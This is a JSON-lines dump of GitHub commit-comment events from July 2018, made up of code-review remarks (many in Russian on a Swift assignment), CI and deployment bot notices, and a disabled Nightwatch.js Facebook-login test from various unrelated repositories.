{"id":"7958401853","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29690337,"position":null,"line":null,"path":null,"commit_id":"62c37254b4ee21059c51187460bbc0f6b83a455e","created_at":"2018-07-12T20:01:52Z","updated_at":"2018-07-12T20:01:52Z","author_association":"COLLABORATOR","body":"The error that was coming up was `glassbr.EXE: Cannot find path from inputs to outputs`."}},"created_at":"2018-07-12T20:01:52Z"}
{"id":"7958408179","type":"CommitCommentEvent","actor":{"login":"chr1sGit"},"repo":{"name":"GoogleCloudPlatform/python-docs-samples"},"payload":{"comment":{"id":29690348,"position":null,"line":null,"path":null,"commit_id":"b0bd8e9ce6b1535c81715b35fed05cef2aa37cba","created_at":"2018-07-12T20:03:09Z","updated_at":"2018-07-12T20:03:09Z","author_association":"NONE","body":"Hello jerjou,\r\nI am using your code. Thanks a lot for that!\r\nA new exception is thrown: exceptions.DeadlineExceeded\r\nWhat is the best way to handle that exception so that continuous transcribing is possible?\r\nRegards Chr1sGit\r\n"}},"created_at":"2018-07-12T20:03:09Z"}
{"id":"7958416143","type":"CommitCommentEvent","actor":{"login":"TamaraShi"},"repo":{"name":"TamaraShi/Brand"},"payload":{"comment":{"id":29690368,"position":null,"line":null,"path":null,"commit_id":"010d520587f48fcc4026c1e652d308fe8d82223f","created_at":"2018-07-12T20:04:49Z","updated_at":"2018-07-12T20:04:49Z","author_association":"OWNER","body":"/**\r\n * =============================================================================\r\n * Demo of Facebook Connect automated login with Nightwatch.js.\r\n * The test navigates to digg.com and tries to perform a Facebook connect login.\r\n *\r\n * This test requires a fbcredentials.json file to be placed in the same\r\n * folder, containing the facebook username and password in the form below:\r\n * -----\r\n * {\r\n *   \"username\" : \"\",\r\n *   \"password\" : \"\"\r\n * }\r\n * -----\r\n * The test only works if you have the permissions ALREADY enabled for digg.com\r\n * in your facebook account.\r\n * =============================================================================\r\n */\r\n\r\nmodule.exports = {\r\n  disabled : true,\r\n\r\n  'digg facebook login' : function (client) {\r\n    var fbcredentials;\r\n    try {\r\n      fbcredentials = require('./fbcredentials.json');\r\n    } catch (err) {\r\n      console.error('Couldn\\'t load the facebook credentials file. Please ensure that ' +\r\n        'you have the fbcredentials.json in the same folder as the test.');\r\n      process.exit();\r\n    }\r\n\r\n    client\r\n      .url('http://digg.com')\r\n      .waitForElementVisible('body', 1000)\r\n      .click('#nav-signin')\r\n      .click('#btn-facebook-auth-topnav')\r\n      .windowHandles(function(result) {\r\n        client.assert.equal(result.value.length, 2, 'There should be two windows open.');\r\n        var fbWindowHandle = result.value[1];\r\n        client.switchWindow(fbWindowHandle);\r\n      })\r\n      .waitForElementVisible('#facebook body', 1000)\r\n      .setValue('input#email', fbcredentials.username)\r\n      .setValue('input#pass', fbcredentials.password)\r\n      .click('#loginbutton input')\r\n      .windowHandles(function(result) {\r\n        client.assert.equal(result.value.length, 1, 'There should be only one window open.');\r\n        client.switchWindow(result.value[0]);\r\n      })\r\n      .waitForElementVisible('#digg-header.authenticated', 3000)\r\n      .end();\r\n  }\r\n};\r\n"}},"created_at":"2018-07-12T20:04:49Z"}
{"id":"7958418532","type":"CommitCommentEvent","actor":{"login":"DJCrashdummy"},"repo":{"name":"PhilippC/keepass2android"},"payload":{"comment":{"id":29690373,"position":7,"line":363,"path":"src/keepass2android/Resources/values/strings.xml","commit_id":"c8a4978b5f99161f3611005814c2527ff076a11f","created_at":"2018-07-12T20:05:18Z","updated_at":"2018-07-12T20:05:18Z","author_association":"CONTRIBUTOR","body":"ok... i thought something like this. but wasn't sure."}},"created_at":"2018-07-12T20:05:18Z"}
{"id":"7958419584","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29690375,"position":null,"line":null,"path":null,"commit_id":"bd01322a756cd30fddf04c8289714153c30dd5f7","created_at":"2018-07-12T20:05:35Z","updated_at":"2018-07-12T20:05:35Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-124](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-124).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-124-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-12T20:05:35Z"}
{"id":"7958420818","type":"CommitCommentEvent","actor":{"login":"bmat7717"},"repo":{"name":"bmat7717/sample-cloud-native-toolchain-tutorial-20180711164926396"},"payload":{"comment":{"id":29690377,"position":null,"line":null,"path":null,"commit_id":"08ea38ede2863a1096cf5f58b783e47fffd344c8","created_at":"2018-07-12T20:05:52Z","updated_at":"2018-07-12T20:05:52Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e6dff075-9245-474a-ae5b-0a597014cb8f?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180711164926396\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/58352fe8-148f-4101-9eda-8ef7aefd707f?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180711164926396\") deployed [sample-cloud-native-toolchain-tutorial-20180711164926396](https://github.com/bmat7717/sample-cloud-native-toolchain-tutorial-20180711164926396/releases/tag/deploy-ibm-yp-us-south-junkmail4ever55-gmail.com-test-20180712-200551 \"deploy-ibm-yp-us-south-junkmail4ever55-gmail.com-test-20180712-200551\") to [test](https://console.bluemix.net/apps/fd6ee2aa-e05d-4130-bf9b-72ecbb8fd912?env_id=ibm:yp:us-south \"ibm:yp:us-south:junkmail4ever55@gmail.com:test\"), including this commit"}},"created_at":"2018-07-12T20:05:52Z"}
{"id":"7958430424","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29690403,"position":15,"line":83,"path":"code/drasil-code/Language/Drasil/CodeSpec.hs","commit_id":"62c37254b4ee21059c51187460bbc0f6b83a455e","created_at":"2018-07-12T20:07:59Z","updated_at":"2018-07-12T20:07:59Z","author_association":"COLLABORATOR","body":"@JacquesCarette @szymczdm Is this considered a hack? Although the `SystemInformation` now takes in a list of `DataDefinition` instead of `QDefinition`s as requested in #747, at the lower level, the `QDefinition`s are still extracted out from the `DataDefinition`s..."}},"created_at":"2018-07-12T20:07:59Z"}
{"id":"7958431341","type":"CommitCommentEvent","actor":{"login":"kramasundaram"},"repo":{"name":"kramasundaram/Homework"},"payload":{"comment":{"id":29690408,"position":null,"line":null,"path":null,"commit_id":"64d240b92dc5a9f8a85014bd70f98ae35c41319b","created_at":"2018-07-12T20:08:11Z","updated_at":"2018-07-12T20:08:11Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-12T20:08:11Z"}
{"id":"7958431400","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29690409,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-12T20:08:12Z","updated_at":"2018-07-12T20:08:12Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T20:08:12Z"}
{"id":"7958435407","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29690420,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-12T20:09:06Z","updated_at":"2018-07-12T20:09:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T20:09:06Z"}
{"id":"7958441814","type":"CommitCommentEvent","actor":{"login":"bmat7717"},"repo":{"name":"bmat7717/sample-cloud-native-toolchain-tutorial-20180711164926396"},"payload":{"comment":{"id":29690438,"position":null,"line":null,"path":null,"commit_id":"08ea38ede2863a1096cf5f58b783e47fffd344c8","created_at":"2018-07-12T20:10:27Z","updated_at":"2018-07-12T20:10:27Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e6dff075-9245-474a-ae5b-0a597014cb8f?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180711164926396\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/58352fe8-148f-4101-9eda-8ef7aefd707f?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180711164926396\") deployed [sample-cloud-native-toolchain-tutorial-20180711164926396](https://github.com/bmat7717/sample-cloud-native-toolchain-tutorial-20180711164926396/releases/tag/deploy-ibm-yp-us-south-junkmail4ever55-gmail.com-prod-20180712-201026 \"deploy-ibm-yp-us-south-junkmail4ever55-gmail.com-prod-20180712-201026\") to [prod](https://console.bluemix.net/apps/08dccf11-4ac1-497b-aef6-948defcae008?env_id=ibm:yp:us-south \"ibm:yp:us-south:junkmail4ever55@gmail.com:prod\"), including this commit"}},"created_at":"2018-07-12T20:10:27Z"}
{"id":"7958449103","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690450,"position":13,"line":13,"path":"AssignmentIV/ConcentrationGame/ConcentrationThemeChooserViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:12:00Z","updated_at":"2018-07-12T20:12:00Z","author_association":"NONE","body":"модели не хранятся в Vc"}},"created_at":"2018-07-12T20:12:00Z"}
{"id":"7958449410","type":"CommitCommentEvent","actor":{"login":"nt1m"},"repo":{"name":"FirefoxUX/icons"},"payload":{"comment":{"id":29690452,"position":null,"line":null,"path":null,"commit_id":"0c752f537120a4c902bb3c9e8d0585bce363d080","created_at":"2018-07-12T20:12:04Z","updated_at":"2018-07-12T20:12:04Z","author_association":"COLLABORATOR","body":"@bwinton Sorry, I wanted to push to my fork and accidentally pushed to master, feel free to back it out."}},"created_at":"2018-07-12T20:12:04Z"}
{"id":"7958453628","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690461,"position":39,"line":39,"path":"AssignmentIV/ConcentrationGame/ConcentrationThemeChooserViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:12:56Z","updated_at":"2018-07-12T20:12:56Z","author_association":"NONE","body":"странный перенос, можно было эту строку оставить, остальное уже равнять по ней"}},"created_at":"2018-07-12T20:12:56Z"}
{"id":"7958455249","type":"CommitCommentEvent","actor":{"login":"bwinton"},"repo":{"name":"FirefoxUX/icons"},"payload":{"comment":{"id":29690465,"position":null,"line":null,"path":null,"commit_id":"0c752f537120a4c902bb3c9e8d0585bce363d080","created_at":"2018-07-12T20:13:17Z","updated_at":"2018-07-12T20:13:17Z","author_association":"CONTRIBUTOR","body":"Already backed out. Thanks! 🙂\r\n\r\nAs penance, please review the PR I just submitted. 😉"}},"created_at":"2018-07-12T20:13:17Z"}
{"id":"7958457891","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690470,"position":43,"line":43,"path":"AssignmentIV/ConcentrationGame/ConcentrationThemeChooserViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:13:50Z","updated_at":"2018-07-12T20:13:50Z","author_association":"NONE","body":"совершенно не емкое имя переменной"}},"created_at":"2018-07-12T20:13:50Z"}
{"id":"7958459072","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29690474,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-12T20:14:05Z","updated_at":"2018-07-12T20:14:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T20:14:05Z"}
{"id":"7958460615","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690476,"position":43,"line":43,"path":"AssignmentIV/ConcentrationGame/ConcentrationThemeChooserViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:14:24Z","updated_at":"2018-07-12T20:14:24Z","author_association":"NONE","body":"тут лучше guard"}},"created_at":"2018-07-12T20:14:24Z"}
{"id":"7958463019","type":"CommitCommentEvent","actor":{"login":"Ione75"},"repo":{"name":"composer/composer"},"payload":{"comment":{"id":29690485,"position":14,"line":190,"path":"src/Composer/Plugin/PluginManager.php","commit_id":"25f47988e52181b588e1e75915b2616a49e05a9d","created_at":"2018-07-12T20:14:55Z","updated_at":"2018-07-12T20:14:55Z","author_association":"NONE","body":"I'm Confused"}},"created_at":"2018-07-12T20:14:55Z"}
{"id":"7958463174","type":"CommitCommentEvent","actor":{"login":"3D-I"},"repo":{"name":"phpbb/phpbb"},"payload":{"comment":{"id":29690486,"position":35,"line":35,"path":"phpBB/phpbb/db/migration/data/v330/storage_track.php","commit_id":"5087d5d6b659643617368df439a070fc51b39492","created_at":"2018-07-12T20:14:57Z","updated_at":"2018-07-12T20:14:57Z","author_association":"CONTRIBUTOR","body":"Isn't ULINT preferred?\r\n\r\n"}},"created_at":"2018-07-12T20:14:57Z"}
{"id":"7958466984","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29690497,"position":null,"line":null,"path":null,"commit_id":"c889dbc660393f8987874008b18679754f8745d5","created_at":"2018-07-12T20:15:43Z","updated_at":"2018-07-12T20:15:43Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.03 |\n| `metadata_passing` |     1    |\n| `nodes_count`      |   688    |\n| `texts_passing`    |     1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   +19758 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc2.xml` | New      |\n| `./data/tlg0561/tlg001/__cts__.xml`                     | Passing  |\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc2.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4446)*\n"}},"created_at":"2018-07-12T20:15:43Z"}
{"id":"7958467768","type":"CommitCommentEvent","actor":{"login":"JeRoNZ"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":29690499,"position":null,"line":null,"path":null,"commit_id":"23ce0690588992de6406791701251c7a380fa3c4","created_at":"2018-07-12T20:15:53Z","updated_at":"2018-07-12T20:15:53Z","author_association":"NONE","body":"Awesome. Thanks."}},"created_at":"2018-07-12T20:15:53Z"}
{"id":"7958468097","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690500,"position":44,"line":44,"path":"AssignmentIV/ConcentrationGame/ConcentrationThemeChooserViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:15:58Z","updated_at":"2018-07-12T20:15:58Z","author_association":"NONE","body":"можно было написать что-то вроде return cvc.theme == nil"}},"created_at":"2018-07-12T20:15:58Z"}
{"id":"7958469570","type":"CommitCommentEvent","actor":{"login":"AmsAndre"},"repo":{"name":"paaraujogit/pa-acad-java6"},"payload":{"comment":{"id":29690503,"position":null,"line":null,"path":null,"commit_id":"2276046ace4a065b2b11bd7d729d765067b022a9","created_at":"2018-07-12T20:16:14Z","updated_at":"2018-07-12T20:16:14Z","author_association":"COLLABORATOR","body":"gvfsdfgfg"}},"created_at":"2018-07-12T20:16:14Z"}
{"id":"7958474754","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690516,"position":57,"line":57,"path":"AssignmentIV/ConcentrationGame/ConcentrationThemeChooserViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:17:22Z","updated_at":"2018-07-12T20:17:22Z","author_association":"NONE","body":"дублирование кода"}},"created_at":"2018-07-12T20:17:22Z"}
{"id":"7958475640","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29690517,"position":null,"line":null,"path":null,"commit_id":"1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd","created_at":"2018-07-12T20:17:33Z","updated_at":"2018-07-12T20:17:33Z","author_association":"NONE","body":"issue_6736 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a0d274927c2bb06b414438f8ab1a48ac8dbe4bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-12T20:17:33Z"}
{"id":"7958476885","type":"CommitCommentEvent","actor":{"login":"svitx"},"repo":{"name":"ViceIndustryToken/beem"},"payload":{"comment":{"id":29690520,"position":null,"line":null,"path":null,"commit_id":"a39c203153bb40cd001963b8028d02c4002a82c5","created_at":"2018-07-12T20:17:48Z","updated_at":"2018-07-12T20:17:48Z","author_association":"NONE","body":"Should also be added to known_prefixes in beemgraphenebase/base58.py"}},"created_at":"2018-07-12T20:17:48Z"}
{"id":"7958479036","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690523,"position":62,"line":62,"path":"AssignmentIV/ConcentrationGame/ConcentrationThemeChooserViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:18:13Z","updated_at":"2018-07-12T20:18:13Z","author_association":"NONE","body":"идентифайер лучше в константы загнать,вдруг еще понадобится где"}},"created_at":"2018-07-12T20:18:13Z"}
{"id":"7958488561","type":"CommitCommentEvent","actor":{"login":"twinters01"},"repo":{"name":"twinters01/rekt"},"payload":{"comment":{"id":29690545,"position":5,"line":7,"path":"app/views/snippets/user/basicInfo.php","commit_id":"3f1f2f6c6c2888bd32a06bdf8200dcaf140c958c","created_at":"2018-07-12T20:20:14Z","updated_at":"2018-07-12T20:20:14Z","author_association":"OWNER","body":"You can't create a direct link to a view with this framework. \r\n\r\nRemember: the format is URLROOT/controller/method/parameters\r\n\r\nThis href should be URLROOT/users/editProfile, then you need a method to handle that request in the controller. (Which will probably just present the view on a GET request like this.)"}},"created_at":"2018-07-12T20:20:14Z"}
{"id":"7958489081","type":"CommitCommentEvent","actor":{"login":"jtopjian"},"repo":{"name":"JackKuei/gophercloud"},"payload":{"comment":{"id":29690547,"position":5,"line":420,"path":"openstack/clustering/v1/clusters/requests.go","commit_id":"a7698dfc233a5141dea177f491fc8c105b3ea407","created_at":"2018-07-12T20:20:20Z","updated_at":"2018-07-12T20:20:20Z","author_association":"NONE","body":"Good catch. The changes here are legitimate but backwards.\r\n\r\n```\r\nToClusterPoliciesListQuery\r\n```\r\n\r\nIs the right format.\r\n\r\n```\r\nTo - Resource - Action - Result\r\nTo - ClusterPolicies - List - Query\r\n```\r\n\r\nLine 429 needs changed instead."}},"created_at":"2018-07-12T20:20:20Z"}
{"id":"7958490565","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690552,"position":77,"line":77,"path":"AssignmentIV/ConcentrationGame/ConcentrationThemeChooserViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:20:39Z","updated_at":"2018-07-12T20:20:39Z","author_association":"NONE","body":"а вот и повторное использование этой строки, если в каком то из мест поменяешь, а во втором забудешь, что будет? "}},"created_at":"2018-07-12T20:20:39Z"}
{"id":"7958492533","type":"CommitCommentEvent","actor":{"login":"bparees"},"repo":{"name":"jboss-fuse/application-templates"},"payload":{"comment":{"id":29690553,"position":18,"line":37,"path":"fis-image-streams.json","commit_id":"400bea1de0fd576e5ab4f256f2c314268a1c0a0c","created_at":"2018-07-12T20:21:03Z","updated_at":"2018-07-12T20:21:03Z","author_association":"NONE","body":"@astefanutti you should not be removing imagestreamtags, people can have references to them and you will break their references.  Can you please revert this removal (same for the one below)\r\n\r\n"}},"created_at":"2018-07-12T20:21:03Z"}
{"id":"7958492587","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29690554,"position":null,"line":null,"path":null,"commit_id":"04d938f1f2c92075f626f45dfccaa6b1a6882243","created_at":"2018-07-12T20:21:04Z","updated_at":"2018-07-12T20:21:04Z","author_association":"COLLABORATOR","body":"![image](https://user-images.githubusercontent.com/6131799/42657196-db4f2636-8621-11e8-800b-e112a9f807ee.png)\r\n"}},"created_at":"2018-07-12T20:21:04Z"}
{"id":"7958493705","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690561,"position":78,"line":78,"path":"AssignmentIV/ConcentrationGame/ConcentrationThemeChooserViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:21:16Z","updated_at":"2018-07-12T20:21:16Z","author_association":"NONE","body":"опять эта же проверка, надо её как-то унифицировать."}},"created_at":"2018-07-12T20:21:16Z"}
{"id":"7958494141","type":"CommitCommentEvent","actor":{"login":"timocapa"},"repo":{"name":"timocapa/hackintosh-clover"},"payload":{"comment":{"id":29690562,"position":null,"line":null,"path":null,"commit_id":"95d0fe28a9ac01941a2a554150a78eb1d6451a77","created_at":"2018-07-12T20:21:21Z","updated_at":"2018-07-12T20:21:21Z","author_association":"OWNER","body":"disabled**"}},"created_at":"2018-07-12T20:21:21Z"}
{"id":"7958499041","type":"CommitCommentEvent","actor":{"login":"twinters01"},"repo":{"name":"twinters01/rekt"},"payload":{"comment":{"id":29690577,"position":null,"line":null,"path":null,"commit_id":"3f1f2f6c6c2888bd32a06bdf8200dcaf140c958c","created_at":"2018-07-12T20:22:19Z","updated_at":"2018-07-12T20:22:19Z","author_association":"OWNER","body":"You need to add an editProfile method in the users controller to handle the backend stuff."}},"created_at":"2018-07-12T20:22:19Z"}
{"id":"7958499697","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690579,"position":15,"line":15,"path":"AssignmentIV/ConcentrationGame/ConcentrationViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:22:27Z","updated_at":"2018-07-12T20:22:27Z","author_association":"NONE","body":"лучше тут использоать слово \"количество\", а не \"цифра\""}},"created_at":"2018-07-12T20:22:27Z"}
{"id":"7958502711","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690588,"position":30,"line":30,"path":"AssignmentIV/ConcentrationGame/ConcentrationViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:23:05Z","updated_at":"2018-07-12T20:23:05Z","author_association":"NONE","body":"где-то я это уже видел раньше"}},"created_at":"2018-07-12T20:23:05Z"}
{"id":"7958510671","type":"CommitCommentEvent","actor":{"login":"AktuBuct"},"repo":{"name":"Ziangirov/CS193P.Assignment4.Set.Animated"},"payload":{"comment":{"id":29690608,"position":42,"line":42,"path":"AssignmentIV/ConcentrationGame/ConcentrationViewController.swift","commit_id":"7b651b085ca2908a708bd1e3f9f9a16932abdce4","created_at":"2018-07-12T20:24:47Z","updated_at":"2018-07-12T20:24:47Z","author_association":"NONE","body":"ради лучшей читаемости тут можно сделать явное сравнение"}},"created_at":"2018-07-12T20:24:47Z"}
{"id":"7958529469","type":"CommitCommentEvent","actor":{"login":"jagbirsidhu81"},"repo":{"name":"jagbirsidhu81/helloworld"},"payload":{"comment":{"id":29690672,"position":2,"line":2,"path":"README.md","commit_id":"fe5be5a8a04b86a139af721e18ea22f425c5f6b3","created_at":"2018-07-12T20:28:47Z","updated_at":"2018-07-12T20:28:47Z","author_association":"OWNER","body":"remove repositry"}},"created_at":"2018-07-12T20:28:47Z"}
{"id":"7958536792","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29690692,"position":null,"line":null,"path":null,"commit_id":"8a0870ae8933ced67799989653377a46cc310cc1","created_at":"2018-07-12T20:30:18Z","updated_at":"2018-07-12T20:30:18Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-203017 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-203017\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T20:30:18Z"}
